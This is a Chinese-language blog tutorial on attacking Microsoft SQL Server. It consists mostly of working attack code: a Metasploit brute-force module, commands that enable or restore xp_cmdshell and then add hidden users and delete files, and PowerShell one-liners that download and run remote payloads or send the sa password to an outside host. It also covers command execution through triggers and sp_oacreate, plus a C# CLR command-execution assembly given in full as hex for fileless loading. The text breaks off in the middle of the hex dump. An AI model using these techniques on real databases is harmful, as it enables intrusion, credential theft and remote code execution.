2. 数据库安全SQL Server
Source
Edit
History

SQL Server数据库攻防详解上篇

Catalogue
  1. 1. by Tahir 2021.3.5
  2. 2. SQL Server概述
    1. 2.1. 客户端/服务器数据库系统
    2. 2.2. TDS协议
  3. 3. SQL Server暴力破解
  4. 4. SQL Server危险的存储过程
    1. 4.1. xp_cmdshell
    2. 4.2. xp_regread
    3. 4.3. xp_fileexist
    4. 4.4. xp_getnetname
    5. 4.5. xp_msver
    6. 4.6. xp_fixeddrives
  5. 5. SQL Server 触发器
  6. 6. SQL Server COM组件
    1. 6.1. SP_OACREATE
    2. 6.2. 启用SP_OACREATE
    3. 6.3. 利用SP_OACREATE执行命令
  7. 7. SQL Server CLR相关利用
    1. 7.1. 创建CLR
    2. 7.2. 利用SQL语句导入程序集
    3. 7.3. 利用CLR执行命令
    4. 7.4. WarSQLKit
    5. 7.5. 导入WarSQLKit DLL文件
    6. 7.6. WarSQLKit 执行命令
  8. 8. SQL Server R和Python的利用
    1. 8.1. R脚本利用
    2. 8.2. Python脚本利用
  9. 9. SQL Server代理执行计划任务
    1. 9.1. 启动SQL Server代理服务
    2. 9.2. 创建计划任务
  10. 10. 参考资料

[TOC]

by Tahir 2021.3.5

SQL Server概述

SQL Server是Microsoft开发的关系数据库管理系统(RDBMS)。 它是市场上最受欢迎的DBMS之一。SQL Server具有极其广泛的用途,它可以在各个方面使用,从存储个人博客的内容到存储客户数据等。

在2017版之前,SQL Server仅适用于Windows。 SQL Server 2017中最大的变化之一是,它现在可在Linux和Docker容器上使用。 这意味着可以在Mac上运行SQL Server。

SQL Server的目前不同版本描述:

版本 描述
Enterprise Edition 此版本仅在Windows Server操作系统上运行。 适用于对速度和可用性具有较高优先级的大型生产数据库服务器。提供复制和联机分析过程(OLAP)服务等功能,这些服务可能会增加其安全风险。
Standard Edition 该版本与Enterprise Edition相似,但缺少虚拟接口系统局域网(VI SAN)支持和某些高级OLAP功能。
Personal Edition 它旨在用于工作站和便携式计算机,而不是服务器。 其设计最多支持五个数据库用户。
Developer Edition 面向开发人员版本,它与Enterprise Edition具有相似的功能,但并不意味着可以在真实的生产环境中运行。

客户端/服务器数据库系统

SQL Server是一个客户端/服务器数据库管理系统(DBMS)。 这允许有许多不同的客户端同时,全部连接到SQL Server。 这些客户端的每一个都可以通过不同的工具进行连接。

例如,一个客户端可能使用如SQL Server Management Studio(SSMS)之类的图形工具,而另一客户端可能使用诸如sqlcmd之类的命令行工具。 同时,网站也可以从Web应用程序连接到SQL Server。 并且可能有许多其他客户端都使用自己的工具出于自己的目的进行连接。

客户端/服务器DBMS的主要优点是多个用户可以同时访问它,每个用户都有特定的访问级别。如果数据库管理员配置对应的权限,则任何连接到SQL Server的客户端将只能访问他们被允许访问的数据库。 他们只能执行允许执行的任务。 所有这些都从SQL Server本身内部进行控制。

TDS协议

表格数据流(Tabular Data Stream, TDS)协议是一种数据库服务器和客户端间交互的应用层协议,为微软SQL Server数据库和Sybase公司数据库产品所采用。

目前TDS协议版本与SQL Server的对应关系:

TDS Version Supported Products
4.2 Sybase SQL Server < 10 and Microsoft SQL Server 6.5
5.0 Sybase SQL Server >= 10
7.0 Microsoft SQL Server 7.0
7.1 Microsoft SQL Server 2000
7.2 Microsoft SQL Server 2005

详细的协议结构分析,请参考:http://freetds.cvs.sourceforge.net/checkout/freetds/freetds/doc/tds.html

SQL Server暴力破解

SQL Server 2005远程连接配置

​ 下载并安装SQL server 2005,启动SQL server的方式如下:

  • 启动SQL Server Management Studio工具,设置数据库登录模式为混合模式,也就是启用sa账户。
  • 登录数据库在根节点右键属性->连接,设置允许远程连接到服务器。
  • 同样根节点右键方面->服务器配置,设置RemoteAccessEnabled的值为True。
  • 启动SQL Server Configuration Manager工具,点击sql sever 服务,需要开启sql sever 和sql sever browser这两个服务。
  • SQL server网络配置中选择MSSQLSERVER的协议(有些是SQLEXPRESS,取决于安装数据库的版本)进行IP设置和端口的开启,需要注意的是需要将VIA协议设为禁止,其他打开。
  • 打开本机防火墙设置->高级设置->入站规则->新建规则,设置端口为1433,一直到最后取个合适的名字保存即可,当然也可以直接关闭防火墙,但是不建议这样做,不安全。

设置可远程访问SQL server 2005,首先查看SQL server 2005 TCP/IP协议访问的端口1433;其次配置防火墙允许其端口的访问。

使用msf来执行爆破

1
use auxiliary/scanner/mssql/mssql_login

SQL Server危险的存储过程

xp_cmdshell

查询xp_cmdshell存储过程是否存在

xtype为对象类型,xtype=’x’,表示存储过程的对象类型为扩展存储过程。

1
select * from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'

TSQL代码判断是否开启xp_cmdshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
declare @RunningOnACluster char(1)
declare @xp_cmdshell_available char(1)
declare @result int 
set @xp_cmdshell_available='Y' 
set @result=0
select @RunningOnACluster=case 
when convert(int, serverproperty('IsClustered')) = 1 then 'Y'
else 'N' 
end 
if(0=(select value_in_use from sys.configurations where name='xp_cmdshell'))
	set @xp_cmdshell_available='N' if @RunningOnACluster='Y' 
begin
	if @xp_cmdshell_available='Y'
		select @result=1
	if @xp_cmdshell_available='N'
		select @result=2
end
select @result

恢复xp_cmdshell存储过程

解决Error Message:未能找到存储过程 ‘master..xp_cmdshell’。

第一步先删除:

1
2
3
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

第二步恢复:

1
2
dbcc addextendedproc("sp_oacreate","odsole70.dll")
dbcc addextendedproc("xp_cmdshell"," ")

直接恢复,不管sp_addextendedproc是不是存在,需要自行上传xplog70.dll,恢复扩展存储过过程xp_cmdshell的语句:

1
dbcc addextendedproc("xp_cmdshell","xplog70.dll")

代码判断一系列存储过程是否存在,若不存在则恢复。

1
2
3
4
5
6
7
8
9
10
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]'))
dbcc addextendedproc ('xp_cmdshell','xplog70.dll')
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_dirtree]'))
dbcc addextendedproc ('xp_dirtree','xpstar.dll')
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_fixeddrives]'))
dbcc addextendedproc ('xp_fixeddrives','xpstar.dll')
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_regwrite]'))
dbcc addextendedproc ('xp_regwrite','xpstar.dll')
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_regread]'))
dbcc addextendedproc ('xp_regread','xpstar.dll')

开启xp_cmdshell存储过程

1
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; exec SP_CONFIGURE 'xp_cmdshell', 1; RECONFIGURE;

关闭xp_cmdshell存储过程

关闭xp_cmdshell配置

1
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;

删除xp_cmdshell的语句:

1
exec sp_dropextendedproc 'xp_cmdshell';

删除xp_cmdshell过程,再添加xp_cmdshell过程,需要自行上传xplog70.dll恢复被删除的xp_cmdshell。

1
2
drop procedure xp_cmdshell;
exec sp_addextendedproc "xp_cmdshell", "xplog70.dll";

附录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
exec sp_addextendedproc xp_enumgroups ,@dllname ='xplog70.dll'
exec sp_addextendedproc xp_loginconfig ,@dllname ='xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs ,@dllname ='xpstar.dll'
exec sp_addextendedproc xp_getfiledetails ,@dllname ='xpstar.dll'
exec sp_addextendedproc Sp_OACreate ,@dllname ='odsole70.dll'
exec sp_addextendedproc Sp_OADestroy ,@dllname ='odsole70.dll'
exec sp_addextendedproc Sp_OAGetErrorInfo ,@dllname ='odsole70.dll'
exec sp_addextendedproc Sp_OAGetProperty ,@dllname ='odsole70.dll'
exec sp_addextendedproc Sp_OAMethod ,@dllname ='odsole70.dll'
exec sp_addextendedproc Sp_OASetProperty ,@dllname ='odsole70.dll'
exec sp_addextendedproc Sp_OAStop ,@dllname ='odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring ,@dllname ='xpstar.dll'
exec sp_addextendedproc xp_regdeletekey ,@dllname ='xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue ,@dllname ='xpstar.dll'
exec sp_addextendedproc xp_regenumvalues ,@dllname ='xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring ,@dllname ='xpstar.dll'
exec sp_addextendedproc xp_regwrite ,@dllname ='xpstar.dll'
exec sp_addextendedproc xp_dirtree ,@dllname ='xpstar.dll'
exec sp_addextendedproc xp_regread ,@dllname ='xpstar.dll'
exec sp_addextendedproc xp_fixeddrives ,@dllname ='xpstar.dll'

xp_cmdshell执行系统命令

xp_cmdshell执行whoami命令

1
2
3
exec master.dbo.xp_cmdshell 'whoami'
exec master.dbo.xp_cmdshell "whoami"
exec xp_cmdshell "whoami";

xp_cmdshell执行ipconfig/all命令

1
exec master..xp_cmdshell 'ipconfig/all'

查询操作系统和版本信息(分别对应中英文系统)

1
2
exec master..xp_cmdshell 'systeminfo | findstr /B /C:"OS Name" /C:"OS Version"'
exec master..xp_cmdshell 'systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"'

通过xp_cmdshell执行wmic 获取系统信息

1
exec master..xp_cmdshell 'wmic cpu get name,NumberOfCores,NumberOfLogicalProcessors/Format:List'

调用reg query注册表键值判断RDP服务的端口号

1
exec master..xp_cmdshell 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber'

通过xp_cmdshell执行添加testuser1用户并且不输出结果

1
exec master..xp_cmdshell 'Net user testuser1 passwd1 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add',NO_OUTPUT

通过xp_cmdshell删除testuser1用户并且不输出结果

1
EXEC master..xp_cmdshell 'net user testuser1/delete', NO_OUTPUT

通过xp_cmdshell执行taskkill 杀死taskmgr.exe,taskmgr.exe用于任务管理器。它显示系统中正在运行的进程。该程序使用Ctrl+Alt+Del(一般是弹出Windows安全再点击“任务管理器”)或者Ctrl+Shift+Esc打开,这不是纯粹的系统程序,但是如果终止它,可能会导致不可知的问题。

1
exec master.dbo.xp_cmdshell 'taskkill /f /im taskmgr.exe';

调用xp_cmdshell执行mkdir命令创建目录

1
exec master..xp_cmdshell 'mkdir "C:\test\" '

通过xp_cmdshell执行dir命令

1
2
exec master..xp_cmdshell 'dir c:\'
exec xp_cmdshell 'dir c:\'

通过xp_cmdshell删除文件

1
exec master..xp_cmdshell 'del C:\test';

xp_cmdshell调用Powershell

通过xp_cmdshell调用powershell 下载http://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1

1
exec xp_cmdshell 'powershell -c "iex((new-object Net.WebClient).DownloadString(''http://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1''))"'

调用xp_cmdshell执行echo CreateObject最后写入C:/ProgramData/vget.vbs文件

1
exec master..xp_cmdshell 'echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 > C:/ProgramData/vget.vbs';

通过xp_cmdshell调用cmd.exe 执行powershell 调用OpenRead方法向数据库发送登录用户名sa密码

1
exec xp_cmdshell 'powershell (new-object System.Net.WebClient).OpenRead(''http://example/test.jsp?data=127.0.0.1%7c1433%7csa%7cDb123456'')'

通过xp_cmdshell调用powershell下载test0.exe后并执行

1
exec master..xp_cmdshell '"echo $client = New-Object System.Net.WebClient > %TEMP%\test.ps1 & echo $client.DownloadFile("http://example/test0.exe","%TEMP%\test.exe") >> %TEMP%\test.ps1 & powershell  -ExecutionPolicy Bypass  %temp%\test.ps1 & WMIC process call create "%TEMP%\test.exe""'

xp_regread

SQL Server存在一系列的存储过程,可以对注册表进行增删改查。xp_regread、xp_regwrite、xp_regdeletvalue、xp_regdeletkey、xp_regaddmultistring等。

读注册表

1
2
exec xp_regread 'HKEY_current_user','Control Panel\International','sCountry'
exec xp_regread N'HKEY_LOCAL_MACHINE', N'SYSTEM\CurrentControlSet\Services\MSSEARCH'

枚举可用的注册表键值

1
exec xp_regenumkeys 'HKEY_CURRENT_USER','Control Panel\International'

xp_fileexist

判读文件是否存在,第一列返回0表示文件不存在,返回1表示文件存在。当执行完无回显命令时,一般都将结果输入至文件中,利用此存储过程可以判断无回显命令是否执行成功。

判读文件是否存在

1
exec xp_fileexist 'C:\\test\test.txt'

列出当前目录

1
exec xp_subdirs "C:\\"

xp_getnetname

获取服务器名称

1
exec xp_getnetname

xp_msver

获取服务器信息

1
exec xp_msver

xp_fixeddrives

获取磁盘空间信息

1
exec xp_fixeddrives

附常用的一些危险的存储过程,可自查存储过程的功能和用法。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
xp_cmdshell
xp_dirtree
xp_enumgroups
xp_fixeddrives
xp_loginconfig
xp_enumerrorlogs
xp_getfiledetails
Sp_OACreate
Sp_OADestroy
Sp_OAGetErrorInfo
Sp_OAGetProperty
Sp_OAMethod
Sp_OASetProperty
Sp_OAStop
Xp_regaddmultistring
Xp_regdeletekey
Xp_regdeletevalue
Xp_regenumvalues
Xp_regread
Xp_regremovemultistring
Xp_regwrite
sp_makewebtask

SQL Server 触发器

SQL Server 触发器用于执行指定动作之后执行sql语句,比如配合update触发sql语句。

首先创建一个test表,插入字段值。

创建一个名为test1的触发器,当test表执行update动作时,触发test1执行xp_cmdshell命令。

1
2
3
4
5
6
7
8
9
10
11
set ANSI_NULLS on
go
set QUOTED_IDENTIFIER on
go
create trigger [test1]
on [test]
AFTER UPDATE as
begin
	execute master..xp_cmdshell 'cmd.exe /c calc.exe'
end
go

执行下列更新test表操作,test1触发器触发。

1
UPDATE test SET name = 'wangwu' WHERE LastName = 'zhangsan'

SQL Server COM组件

SQL Server中的COM组件SP_OACREATE,执行系统命令,但是此利用方法无回显。

SP_OACREATE

查看SP_OACREATE状态。

1
select * from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE'

利用count(*)判断是否存在,,存在即返回1。

1
select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE'

启用SP_OACREATE

利用sp_configure存储过程,启用SP_OACREATE

1
2
exec sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE;   
exec sp_configure 'Ole Automation Procedures', 1; RECONFIGURE WITH OVERRIDE;

利用SP_OACREATE执行命令

利用SP_OACREATE执行系统命令

1
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'C:\Windows\System32\cmd.exe /c whoami /all >C:\\test\test.txt'

SQL Server CLR相关利用

CLR微软官方把他称为公共语言运行时,从 SQL Server 2005 (9.x) 开始,SQL Server 集成了用于 Microsoft Windows 的 .NET Framework 的公共语言运行时 (CLR) 组件。 这意味着现在可以使用任何 .NET Framework 语言(包括 Microsoft Visual Basic .NET 和 Microsoft Visual C#)来编写存储过程、触发器、用户定义类型、用户定义函数、用户定义聚合和流式表值函数。

官方链接:https://docs.microsoft.com/zh-cn/sql/relational-databases/clr-integration/common-language-runtime-clr-integration-programming-concepts?view=sql-server-ver15

在利用MSSQL服务实现命令执行的时候,通常的做法是利用xp_cmdshell存储过程在MSSQL进程的上下文中运行操作系统命令。如果要想利用这种技术运行自定义代码,通常需要使用LOLBINS,添加新的操作系统用户,或通过BCP向磁盘中写入二进制文件,这些方法的缺点是很容易被发现。CLR方式可以利用16进制文件流方式导入DLL文件,这样不需要文件落地。

创建CLR

利用VS创建MSSQL数据库项目

修改目标平台和勾选创建脚本

在SQL Server 2005中引入了从MSSQL运行.NET代码的功能,并在后续版本中叠加了许多保护措施,来限制代码可以访问的内容。在创建.Net程序集时,会给它们指定一个权限级别,例如: 

1
2
3
CREATE ASSEMBLY SQLCLRTest  
FROM 'C:\MyDBApp\SQLCLRTest.dll'  
WITH PERMISSION_SET = SAFE;

其权限集有三个选项:

SAFE:基本上只将MSSQL数据集暴露给代码,其他大部分操作则都被禁止。

EXTERNAL_ACCESS:允许访问底层服务器上某些资源,但不应该允许直接执行代码。

UNSAFE:允许使用任何代码。

微软关于SQL CLR的详细文档可通过以下地址获得: https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration

修改目标框架和权限级别为UNSAFE。

创建SQL CLR C# 存储过程

写入代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Diagnostics;
using System.Text;
using Microsoft.SqlServer.Server;

public partial class StoredProcedures
{
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void ExecCommand (string cmd)
    {
        // 在此处放置代码
        SqlContext.Pipe.Send("Command is running, please wait.");
        SqlContext.Pipe.Send(RunCommand("cmd.exe", " /c " + cmd));
    }
    public static string RunCommand(string filename,string arguments)
    {
        var process = new Process();

        process.StartInfo.FileName = filename;
        if (!string.IsNullOrEmpty(arguments))
        {
            process.StartInfo.Arguments = arguments;
        }

        process.StartInfo.CreateNoWindow = true;
        process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
        process.StartInfo.UseShellExecute = false;

        process.StartInfo.RedirectStandardError = true;
        process.StartInfo.RedirectStandardOutput = true;
        var stdOutput = new StringBuilder();
        process.OutputDataReceived += (sender, args) => stdOutput.AppendLine(args.Data);
        string stdError = null;
        try
        {
            process.Start();
            process.BeginOutputReadLine();
            stdError = process.StandardError.ReadToEnd();
            process.WaitForExit();
        }
        catch (Exception e)
        {
            SqlContext.Pipe.Send(e.Message);
        }

        if (process.ExitCode == 0)
        {
            SqlContext.Pipe.Send(stdOutput.ToString());
        }
        else
        {
            var message = new StringBuilder();

            if (!string.IsNullOrEmpty(stdError))
            {
                message.AppendLine(stdError);
            }

            if (stdOutput.Length != 0)
            {
                message.AppendLine("Std output:");
                message.AppendLine(stdOutput.ToString());
            }
            SqlContext.Pipe.Send(filename + arguments + " finished with exit code = " + process.ExitCode + ": " + message);
        }
        return stdOutput.ToString();
    }
}

编译生成DLL文件。

运行权限级别为“SAFE”的代码,只需启用CLR就可以了;但是,要想运行权限级别为“EXTERNAL_ACCESS”或“UNSAFE”的代码,则需要需要修改相应的配置,以及DBA权限。2017年之前和之后的服务器版本,运行标记为“UNSAFE”的CLR所需步骤是不同的,下面分别进行介绍:

对于SQL Server 2017之前的版本

显示高级选项: 

1
sp_configure 'show advanced options',1;RECONFIGURE

启用CLR: 

1
sp_configure 'clr enabled',1;RECONFIGURE;

将存储.Net程序集的数据库配置为可信赖的。 

1
ALTER DATABASE master SET TRUSTWORTHY ON;

SQL Server 2017及更高版本

对于SQL Server 2017及更高版本,则引入了严格的安全性,也必须禁用。另外,也可以根据提供的SHA512哈希值,针对单个程序集授予其UNSAFE权限,而不是将整个数据库都标记为可信的。对于SQL Server 2017及以上版本,如下所示:

显示高级选项: 

1
sp_configure 'show advanced options',1;RECONFIGURE

启用CLR: 

1
sp_configure 'clr enabled',1;RECONFIGURE;

将某程序集的SHA512哈希值添加到可信程序集列表中: 

1
sp_add_trusted_assembly @hash= <SHA512 of DLL>;

从现在开始,程序集的创建和调用对于任何SQL Server版本来说,都是一样的。

通过十六进制字符串创建程序集——如果可以从十六进制字符串创建程序集,则意味着无需创建一个二进制文件并将其写入SQL服务器进程可访问的位置: 

1
CREATE ASSEMBLY clrassem from <HEX STRING> WITH PERMISSION_SET = UNSAFE;

创建存储过程,以从程序集运行代码: 

1
CREATE PROCEDURE debugrun AS EXTERNAL NAME clrassem.StoredProcedures.runner;

运行该存储过程: 

1
debugrun

在代码运行后,可以删除存储过程、程序集以及受信任的哈希值,并将前面修改的安全设置恢复原值。下面显示了一个完成该任务的SQL查询示例

对于SQL Server 2017及更高版本: 

1
sp_drop_trusted_assembly @hash=<SHA512 of DLL>

对于SQL Server 2017之前的版本: 

1
ALTER DATABASE <CONNECTED DATABASE> SET TRUSTWORTHY OFF;

对于所有版本: 

1
2
3
4
DROP PROCEDURE debugrun;
DROP ASSEMBLY clrassem;
sp_configure 'clr strict security',1;RECONFIGURE
sp_configure 'show advanced options',0;RECONFIGURE

利用SQL语句导入程序集

现在可以利用16进制文件流方式导入DLL文件,这样不需要文件落地。

1
2
3
4
5
CREATE ASSEMBLY [Database1]
    AUTHORIZATION [dbo]
    FROM 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C0103006E587C5E0000000000000000E00022200B013000000E00000006000000000000522C0000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000002C00004F00000000400000A802000000000000000000000000000000000000006000000C000000C82A00001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000580C000000200000000E000000020000000000000000000000000000200000602E72737263000000A8020000004000000004000000100000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000001400000000000000000000000000004000004200000000000000000000000000000000342C00000000000048000000020005007C2200004C0800000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000CA00280600000A72010000706F0700000A00280600000A7243000070725300007002280800000A28020000066F0700000A002A001B300600BC0100000100001173040000060A00730900000A0B076F0A00000A026F0B00000A0003280C00000A16FE010D092C0F00076F0A00000A036F0D00000A0000076F0A00000A176F0E00000A00076F0A00000A176F0F00000A00076F0A00000A166F1000000A00076F0A00000A176F1100000A00076F0A00000A176F1200000A0006731300000A7D010000040706FE0605000006731400000A6F1500000A00140C00076F1600000A26076F1700000A00076F1800000A6F1900000A0C076F1A00000A0000DE18130400280600000A11046F1B00000A6F0700000A0000DE00076F1C00000A16FE01130511052C1D00280600000A067B010000046F1D00000A6F0700000A000038AA00000000731300000A130608280C00000A16FE01130711072C0B001106086F1E00000A2600067B010000046F1F00000A16FE03130811082C22001106725D0000706F1E00000A261106067B010000046F1D00000A6F1E00000A2600280600000A1C8D0E000001251602A2251703A225187275000070A22519076F1C00000A13091209282000000AA2251A72AD000070A2251B1106252D0426142B056F1D00000AA2282100000A6F0700000A0000067B010000046F1D00000A130A2B00110A2A011000000000970025BC0018080000012202282200000A002A4E027B01000004046F2300000A6F1E00000A262A00000042534A4201000100000000000C00000076342E302E33303331390000000005006C000000A8020000237E000014030000B403000023537472696E677300000000C8060000B4000000235553007C0700001000000023475549440000008C070000C000000023426C6F620000000000000002000001571502000902000000FA0133001600000100000014000000030000000100000005000000050000002300000005000000010000000100000003000000010000000000D60101000000000006007001BA0206009001BA0206004601A7020F00DA02000006003C03E4010A005A015A020E001503A7020600EB01E40106002C027A0306002B01BA020E00FA02A7020A0086035A020A0023015A020600C401E4010E000302A7020E00D200A7020E004102A70206001402400006002102400006003100E401000000003700000000000100010001001000E9020000150001000100030110000100000015000100040006007003790050200000000096008D007D000100842000000000960099001A0002005C22000000008618A102060004005C22000000008618A102060004006522000000008300160082000400000001007F0000000100F200000002002B03000001003A020000020010030900A10201001100A10206001900A1020A003100A10206005100A102060061001A0110006900A4001500710035031A003900A10206003900F50132007900E50015007100A403370079001D031500790091033C007900C20041007900AE013C00790087023C00790055033C004900A10206008900A1024700390068004D0039004F0353003900FB000600390075025700990083005C003900430306004100B6005C003900A90060002900C2015C0049000F0164004900CB016000A100C2015C00710035036A002900A1020600590056005C0020002300BA002E000B0089002E00130092002E001B00B10063002B00BA0020000480000000000000000000000000000000002700000004000000000000000000000070005F000000000004000000000000000000000070004A00000000000400000000000000000000007000E40100000000030002000000003C3E635F5F446973706C6179436C617373315F30003C52756E436F6D6D616E643E625F5F300044617461626173653100496E743332003C4D6F64756C653E0053797374656D2E494F0053797374656D2E44617461006765745F44617461006D73636F726C6962006164645F4F757470757444617461526563656976656400636D640052656164546F456E640045786563436F6D6D616E640052756E436F6D6D616E640053656E64006765745F45786974436F6465006765745F4D657373616765007365745F57696E646F775374796C650050726F6365737357696E646F775374796C65007365745F46696C654E616D650066696C656E616D6500426567696E4F7574707574526561644C696E6500417070656E644C696E65006765745F506970650053716C5069706500436F6D70696C657247656E6572617465644174747269627574650044656275676761626C654174747269627574650053716C50726F63656475726541747472696275746500436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E74696D65436F6D7061746962696C697479417474726962757465007365745F5573655368656C6C4578656375746500546F537472696E67006765745F4C656E677468004461746162617365312E646C6C0053797374656D00457863657074696F6E006765745F5374617274496E666F0050726F636573735374617274496E666F0053747265616D526561646572005465787452656164657200537472696E674275696C6465720073656E646572004461746152656365697665644576656E7448616E646C6572004D6963726F736F66742E53716C5365727665722E536572766572006765745F5374616E646172644572726F72007365745F52656469726563745374616E646172644572726F72002E63746F720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F6465730053746F72656450726F63656475726573004461746152656365697665644576656E744172677300617267730050726F63657373007365745F417267756D656E747300617267756D656E747300436F6E636174004F626A6563740057616974466F7245786974005374617274007365745F52656469726563745374616E646172644F7574707574007374644F75747075740053797374656D2E546578740053716C436F6E74657874007365745F4372656174654E6F57696E646F770049734E756C6C4F72456D707479000000004143006F006D006D0061006E0064002000690073002000720075006E006E0069006E0067002C00200070006C006500610073006500200077006100690074002E00000F63006D0064002E00650078006500000920002F0063002000001753007400640020006F00750074007000750074003A0000372000660069006E00690073006800650064002000770069007400680020006500780069007400200063006F006400650020003D00200000053A0020000000593C457501949B4EAC85A8875A6084DC000420010108032000010520010111110400001235042001010E0500020E0E0E11070B120C121D0E0212210212250202080E042000123D040001020E0420010102052001011141052002011C180520010112450320000204200012490320000E0320000805200112250E0500010E1D0E08B77A5C561934E08903061225040001010E062002011C122D0801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F777301080100070100000000040100000000000000006E587C5E00000000020000001C010000E42A0000E40C000052534453CEC8B2762812304EAEE7EF5EE4D9EC7901000000463A5C746F6F6C735F736F757263655C4461746162617365315C4461746162617365315C6F626A5C44656275675C4461746162617365312E706462000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000282C00000000000000000000422C0000002000000000000000000000000000000000000000000000342C0000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF250020001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000004C02000000000000000000004C0234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000000000000000000000000000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004AC010000010053007400720069006E006700460069006C00650049006E0066006F0000008801000001003000300030003000300034006200300000002C0002000100460069006C0065004400650073006300720069007000740069006F006E000000000020000000300008000100460069006C006500560065007200730069006F006E000000000030002E0030002E0030002E00300000003C000E00010049006E007400650072006E0061006C004E0061006D00650000004400610074006100620061007300650031002E0064006C006C0000002800020001004C006500670061006C0043006F00700079007200690067006800740000002000000044000E0001004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000004400610074006100620061007300650031002E0064006C006C000000340008000100500072006F006400750063007400560065007200730069006F006E00000030002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000030002E0030002E0030002E0030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C000000543C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000